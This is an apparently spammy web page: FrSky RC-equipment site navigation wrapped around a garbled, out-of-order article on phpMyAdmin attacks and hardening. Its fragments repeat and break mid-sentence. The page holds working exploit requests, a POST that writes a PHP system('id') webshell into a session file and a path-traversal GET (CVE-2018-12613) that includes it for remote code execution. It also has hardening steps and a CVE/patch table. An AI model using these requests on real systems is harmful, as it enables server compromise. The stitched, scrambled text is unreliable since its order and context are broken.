Become a DealerRegister / login
FrSky - Lets you set the limits
0
Product was successfully added to your cart
phpmyadmin hacktricks patched
  • HOME
  • PRODUCTS
    • TRANSMITTER
      • Tandem Series
      • Twin Series
      • Taranis Series
      • Horus Series
      • RF Modules
    • RECEIVERS
      • 2.4G&900MHz TD
      • DUAL 2.4GHz TW
      • 2.4GHz ACCESS
      • 900MHz R9
      • 2.4GHz ACCST
      • 2.4GHz TF
    • CONTROL EQUIPMENT
      • Flight-Safe System
        • Redundancy Bus
        • Power Switch
        • NFC
      • Pilot Gear Controller (PGC)
      • Advanced Engine Suite (AES)
      • Trainer Module
    • SERVOS
      • Standard
      • Mini
      • Micro
    • ESC & BEC
      • ESC
      • SBEC
    • SENSOR & ACCESSORIES
      • Sensor
        • Current
        • Batt Voltage
        • Variometer
        • Airspeed
        • GPS & RemoteID
        • Gas Suite
        • Other
      • Accessories
    • NEW
      • Vision Modules
    • OTHERS
      • Flight Controller
      • VTX
      • RC Airplane
      • Discontinued
  • PURCHASE
  • TECHNOLOGY
    • ACCESS
    • FBUSnew
  • DOWNLOAD
    • PRODUCTS
    • LUA SCRIPT
  • SUPPORT
    • SERVICE CENTER
    • APP
    • How to
    • FAQ
    • Developing Union

Phpmyadmin Hacktricks Patched -

Introduction phpMyAdmin is the most popular database management tool on the web. Written in PHP, it provides a graphical interface for MySQL and MariaDB. Unfortunately, its ubiquity makes it a prime target for attackers. In the world of penetration testing and red teaming (often summarized as "HackTricks"), phpMyAdmin is a goldmine—capable of leading to Remote Code Execution (RCE) , Local File Inclusion (LFI) , SQL injection , and privilege escalation .

htpasswd -c /etc/phpmyadmin/.htpasswd admin This blocks automated scanners even if a phpMyAdmin zero-day exists. Set $cfg['Servers'][$i]['auth_type'] = 'http'; instead of 'cookie' . This uses browser's native Basic Auth, which is harder to bruteforce (no CSRF token leak) and integrates with external authentication modules. 4.4 Remove Default Aliases (The "Hidden" Patch) Attackers rely on default URLs. Change your alias: phpmyadmin hacktricks patched

POST /index.php?db=mysql&table=user HTTP/1.1 ... Content-Type: application/url-encoded sql_query=SELECT "<?php system('id'); ?>" INTO OUTFILE "/tmp/sess_attacker" In the world of penetration testing and red

<Location /phpmyadmin> Require ip 192.168.1.0/24 Require ip 10.0.0.0/8 Require ip 127.0.0.1 Deny from all </Location> Add an extra layer of Basic Auth before phpMyAdmin's login page. This uses browser's native Basic Auth, which is

GET /index.php?target=db_sql.php%3f/../../../../../../tmp/sess_attacker HTTP/1.1 Result: uid=33(www-data) gid=33(www-data) – RCE achieved.

However, a patch is not magic. It must be applied correctly, and defenses must be layered with network restrictions and file permissions. For a penetration tester, "patched" means moving on to another vector. For a system administrator, "patched" means security.

# Move the folder mv /usr/share/phpmyadmin /var/www/html/secret_admin_92jsL # Update config accordingly | CVE | Affected Versions | HackTrick Technique | Patch Version | What the Patch Does | | --- | --- | --- | --- | --- | | CVE-2016-5734 | 4.0.0 - 4.6.2 | RCE via preg_replace /e | 4.6.3 | Removed /e modifier, sanitized column names | | CVE-2018-12613 | 4.8.0 | LFI to RCE via target param | 4.8.1 | Whitelisted target values, realpath validation | | CVE-2019-6799 | 4.8.0 - 4.8.5 | Arbitrary file upload via SQL file | 4.8.6 | MIME validation, rename uploaded files | | CVE-2020-26935 | 5.0.0 - 5.0.2 | SQL injection via db param | 5.0.3 | Escaped database names in _getSQLCondition() | | CVE-2022-23808 | 5.1.1 - 5.1.3 | XSS in transformation feature | 5.1.4 | Output encoding of transformation options |

ABOUT US

  • CONTACT
  • WHO WE ARE
  • NEWS
  • EVENTS

COOPERATION

  • DEALER
  • SUPPLIER
  • REVIEWER
  • BETA TESTER

COMMUNITY

  • RC GROUPS
  • GitHub
  • INAV FIXED WING GROUP
  • FrSky-USA User Group
Facebook
YouTube
Instagram

NEWSLETTER

Type your email address below and receive our daily news letter for FREE

phpmyadmin hacktricks patched

Copyright © 2024 FrSky. All Right Reserved.

Privacy Policy | Use of Cookies | Terms of Use | Site Map